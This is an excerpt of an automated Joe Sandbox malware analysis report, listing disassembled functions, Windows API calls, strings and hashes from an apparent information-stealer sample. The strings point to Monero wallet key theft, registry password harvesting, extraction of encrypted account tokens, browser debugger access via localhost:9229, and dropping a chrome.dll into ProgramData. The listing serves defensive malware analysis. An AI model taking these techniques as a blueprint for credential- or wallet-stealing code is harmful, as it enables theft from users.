                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 4d2eeae6e1dfdf79f718632cb90045aaf42fb0099ce669a875b18fb45043fd22
                            • Instruction ID: 894ee3fd71bebb9ab89398d26f238f7678825582b598657a731f98436f6b0bbb
                            • Opcode Fuzzy Hash: 4d2eeae6e1dfdf79f718632cb90045aaf42fb0099ce669a875b18fb45043fd22
                            • Instruction Fuzzy Hash: 7C5173B1D501189BDB15FB60DCA6FED773CAB50300F4045D8BB0A62082EE346B89DBA6
                            APIs
                            • InternetOpenA.WININET(00F50AF6,00000001,00000000,00000000,00000000), ref: 00F39A6A
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00F39AAB
                            • InternetCloseHandle.WININET(00000000), ref: 00F39AC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$Open$CloseHandle
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 3289985339-2144369209
                            • Opcode ID: 0ac3181af951a8eff2b8be30758b0b50710aaf84aae0d80308886c35cad5e775
                            • Instruction ID: f0dc5690f052a350fb4621f4db315761772db0f389c4fd1b77f0cec929941fb9
                            • Opcode Fuzzy Hash: 0ac3181af951a8eff2b8be30758b0b50710aaf84aae0d80308886c35cad5e775
                            • Instruction Fuzzy Hash: 25414F35A10258EBDB14EF90DC95FDDB778BB48750F104154FA49AB180CBB4AE84EF60
                            APIs
                              • Part of subcall function 00F37330: memset.MSVCRT ref: 00F37374
                              • Part of subcall function 00F37330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F3739A
                              • Part of subcall function 00F37330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F37411
                              • Part of subcall function 00F37330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F3746D
                              • Part of subcall function 00F37330: GetProcessHeap.KERNEL32(00000000,?), ref: 00F374B2
                              • Part of subcall function 00F37330: HeapFree.KERNEL32(00000000), ref: 00F374B9
                            • lstrcat.KERNEL32(00000000,00F5192C), ref: 00F37666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00F376A8
                            • lstrcat.KERNEL32(00000000, : ), ref: 00F376BA
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00F376EF
                            • lstrcat.KERNEL32(00000000,00F51934), ref: 00F37700
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00F37733
                            • lstrcat.KERNEL32(00000000,00F51938), ref: 00F3774D
                            • task.LIBCPMTD ref: 00F3775B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 8c240bb20cea4eabda589ec6c851751a54347728b6b2c94eabad9309209a65d2
                            • Instruction ID: 4b851ee55e26a42a1d2acadec9f2256f92578712a8819da457bdea81fb630b40
                            • Opcode Fuzzy Hash: 8c240bb20cea4eabda589ec6c851751a54347728b6b2c94eabad9309209a65d2
                            • Instruction Fuzzy Hash: D13172B6D00208DFDB15EBE0ECA9DFF7779AB44311F104208F542A3296DA38B946EB51
                            APIs
                            • memset.MSVCRT ref: 00F37374
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F3739A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F37411
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F3746D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00F374B2
                            • HeapFree.KERNEL32(00000000), ref: 00F374B9
                            • task.LIBCPMTD ref: 00F375B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: 96bd7a4f59d7fa7ed2a4a5059f1fa482efade2add107d4b9ec359eb0fc34c465
                            • Instruction ID: ab642e8bf779ce2fd07399f24e6138b55e2bbec47960ca9fbeaf7a677ddd8296
                            • Opcode Fuzzy Hash: 96bd7a4f59d7fa7ed2a4a5059f1fa482efade2add107d4b9ec359eb0fc34c465
                            • Instruction Fuzzy Hash: 83613EB1D0425C9BDB24DB50CC45BDAB7B8BF44310F0081E9E649A6241DFB4ABC9DF90
                            APIs
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                            • wsprintfA.USER32 ref: 00F39E7F
                            • memset.MSVCRT ref: 00F39EED
                            • lstrcat.KERNEL32(00000000,?), ref: 00F39F03
                            • lstrcat.KERNEL32(00000000,?), ref: 00F39F17
                            • lstrcat.KERNEL32(00000000,00F512D8), ref: 00F39F29
                            • lstrcpy.KERNEL32(?,00000000), ref: 00F39F7C
                            • memset.MSVCRT ref: 00F39F9C
                            • Sleep.KERNEL32(00001388), ref: 00F3A013
                              • Part of subcall function 00F499A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F499C5
                              • Part of subcall function 00F499A0: Process32First.KERNEL32(00F3A056,00000128), ref: 00F499D9
                              • Part of subcall function 00F499A0: Process32Next.KERNEL32(00F3A056,00000128), ref: 00F499F2
                              • Part of subcall function 00F499A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F49A4E
                              • Part of subcall function 00F499A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00F49A6C
                              • Part of subcall function 00F499A0: CloseHandle.KERNEL32(00000000), ref: 00F49A79
                              • Part of subcall function 00F499A0: CloseHandle.KERNEL32(00F3A056), ref: 00F49A88
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                            • String ID: D
                            • API String ID: 3242155833-2746444292
                            • Opcode ID: 6f1b93775312835ff51661e110b485873a23482e3981d43e0455beb0aa67a520
                            • Instruction ID: 2c608fb82093d31807c052742f79e90fb17beeae5042d7b36681f28d1c4e7665
                            • Opcode Fuzzy Hash: 6f1b93775312835ff51661e110b485873a23482e3981d43e0455beb0aa67a520
                            • Instruction Fuzzy Hash: B85188B1D443189BEB24DB60DC4AFDE7778AB44700F004598B60DA72C1EB75AB88DF51
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                              • Part of subcall function 00F34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                            • InternetOpenA.WININET(00F50DFB,00000001,00000000,00000000,00000000), ref: 00F3615F
                            • StrCmpCA.SHLWAPI(?,0098E540), ref: 00F36197
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00F361DF
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F36203
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00F3622C
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F3625A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00F36299
                            • InternetCloseHandle.WININET(?), ref: 00F362A3
                            • InternetCloseHandle.WININET(00000000), ref: 00F362B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 9ea08b06b12218cd1fcad941c3e1d4735531b76029a1690314fcc4292c0caa53
                            • Instruction ID: 5118cdf3f5535dab80279b96f0eedf58b0c491e480037778e6e5144ec95bfbf7
                            • Opcode Fuzzy Hash: 9ea08b06b12218cd1fcad941c3e1d4735531b76029a1690314fcc4292c0caa53
                            • Instruction Fuzzy Hash: 365193B1A40218ABEF20DF90DC49FEE7779AB44315F008198F605A71C1DB74AA89DFA5
                            APIs
                            • type_info::operator==.LIBVCRUNTIME ref: 00FB024D
                            • ___TypeMatch.LIBVCRUNTIME ref: 00FB035B
                            • CatchIt.LIBVCRUNTIME ref: 00FB03AC
                            • CallUnexpected.LIBVCRUNTIME ref: 00FB04C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 2356445960-393685449
                            • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction ID: 4a0a2fb2fa1f1cee4004586780fe2a2c49a0b4ac21f24e89a75e7ce81c33a6e9
                            • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction Fuzzy Hash: A5B19875C00209EFCF29DFA6C8859EFBBB5BF04320B14416AE9116B212DB34DA55EF91
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            • lstrlen.KERNEL32(00000000), ref: 00F3BC6F
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 00F3BC9D
                            • lstrlen.KERNEL32(00000000), ref: 00F3BD75
                            • lstrlen.KERNEL32(00000000), ref: 00F3BD89
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: fb671232e04b338b17555feafd3a34788603ce2154cc2f445b85ccf7c904a515
                            • Instruction ID: 69fa7ed5e044d13c539057bdf546ba39c42e4234e54c6efa4a497a836a6c4bd7
                            • Opcode Fuzzy Hash: fb671232e04b338b17555feafd3a34788603ce2154cc2f445b85ccf7c904a515
                            • Instruction Fuzzy Hash: 59B171729501189BDB15FBA0DCA6EEE7B39FF54304F404558F90662092EF38AA48DB72
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: d420a1274cc187277ec0289162fc2e1b8d46b060d7d9ca8d2da7db034868d9c6
                            • Instruction ID: 5e8fa8bebd66076cfa0895565b30fc26a0ff7a994166f2f223a76ef040f4351f
                            • Opcode Fuzzy Hash: d420a1274cc187277ec0289162fc2e1b8d46b060d7d9ca8d2da7db034868d9c6
                            • Instruction Fuzzy Hash: 00F08230908209EFD3559FE0F40D75CFB31EB05707F114295FA49D61C5C6746A40DB62
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F49850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00F408DC,C:\ProgramData\chrome.dll), ref: 00F49871
                              • Part of subcall function 00F3A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F3A098
                            • StrCmpCA.SHLWAPI(00000000,009889B0), ref: 00F40922
                            • StrCmpCA.SHLWAPI(00000000,00988960), ref: 00F40B79
                            • StrCmpCA.SHLWAPI(00000000,00988810), ref: 00F40A0C
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F40C35
                            Strings
                            • C:\ProgramData\chrome.dll, xrefs: 00F40C30
                            • C:\ProgramData\chrome.dll, xrefs: 00F408CD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                            • API String ID: 585553867-663540502
                            • Opcode ID: 53de85bd5a8f8942751632c07fea223d2ac3a0015b8df53aad63195f93d7979e
                            • Instruction ID: cb02fe1decbaa708d916129ce6860d945e8944c00a61c3a453e9cf3d1041be68
                            • Opcode Fuzzy Hash: 53de85bd5a8f8942751632c07fea223d2ac3a0015b8df53aad63195f93d7979e
                            • Instruction Fuzzy Hash: 2CA158717001089FCB28EF64DD95AAD7B76FF94300F10816DE90A9F251DB34DA05DB92
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 00FAFA1F
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00FAFA27
                            • _ValidateLocalCookies.LIBCMT ref: 00FAFAB0
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00FAFADB
                            • _ValidateLocalCookies.LIBCMT ref: 00FAFB30
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction ID: 590e091d0688d5d5ba6d39b1a5e43e41d5f967bf4876f3aafe4797b4207fb781
                            • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction Fuzzy Hash: E9419171E00219ABCF10EFA9CC80ADE7BB5AF4A324F148165E918AF391D735D909DF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F3501A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F35021
                            • InternetOpenA.WININET(00F50DE3,00000000,00000000,00000000,00000000), ref: 00F3503A
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F35061
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00F35091
                            • InternetCloseHandle.WININET(?), ref: 00F35109
                            • InternetCloseHandle.WININET(?), ref: 00F35116
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: bafa44540d1d2da75a6ea881292fbd520e253116ff169ad8da83aa0b3dffe9e0
                            • Instruction ID: 4d25648ca402417b715754015bc23eacb67d6fdf72e242ec31f5599baafdeba0
                            • Opcode Fuzzy Hash: bafa44540d1d2da75a6ea881292fbd520e253116ff169ad8da83aa0b3dffe9e0
                            • Instruction Fuzzy Hash: F73107F5A40218ABDB24CF54DC89BDDB7B5AB48704F1081D8FB09A7281CB716EC59F98
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0098DC08,00000000,?,00F50E14,00000000,?,00000000), ref: 00F482C0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F482C7
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F482E8
                            • wsprintfA.USER32 ref: 00F4833C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2922868504-3474575989
                            • Opcode ID: c6ff99db1f743792c2b839bd225d3696c17fca2980def001f16357d54377542f
                            • Instruction ID: 54fdd9e4013cca614e6c5e2d6cffababc516f7a9e1ee98ff98dfb199f9c4e299
                            • Opcode Fuzzy Hash: c6ff99db1f743792c2b839bd225d3696c17fca2980def001f16357d54377542f
                            • Instruction Fuzzy Hash: 8A212EB1E44208AFDB10DFD4DC49FAEBBB8FB44B14F104609F615BB280C77869018BA5
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F485B6
                            • wsprintfA.USER32 ref: 00F485E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F4860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F4861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F48629
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            • RegQueryValueExA.ADVAPI32(00000000,0098DBA8,00000000,000F003F,?,00000400), ref: 00F4867C
                            • lstrlen.KERNEL32(?), ref: 00F48691
                            • RegQueryValueExA.ADVAPI32(00000000,0098DD70,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F50B3C), ref: 00F48729
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F48798
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F487AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: b6ca78f053ef52155ed32513b684cdbb7b6f62808fdc794ccb0404c027ee5ab6
                            • Instruction ID: e1f0f2adda0d291a329b5e13aca26b73d86a24ef68fcfdee9e8be48613aded8e
                            • Opcode Fuzzy Hash: b6ca78f053ef52155ed32513b684cdbb7b6f62808fdc794ccb0404c027ee5ab6
                            • Instruction Fuzzy Hash: 8F211971A10218ABDB24DB54DC85FE9B7B8FB48704F0081D8E649A6181DF70AA85CFA4
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F499C5
                            • Process32First.KERNEL32(00F3A056,00000128), ref: 00F499D9
                            • Process32Next.KERNEL32(00F3A056,00000128), ref: 00F499F2
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F49A4E
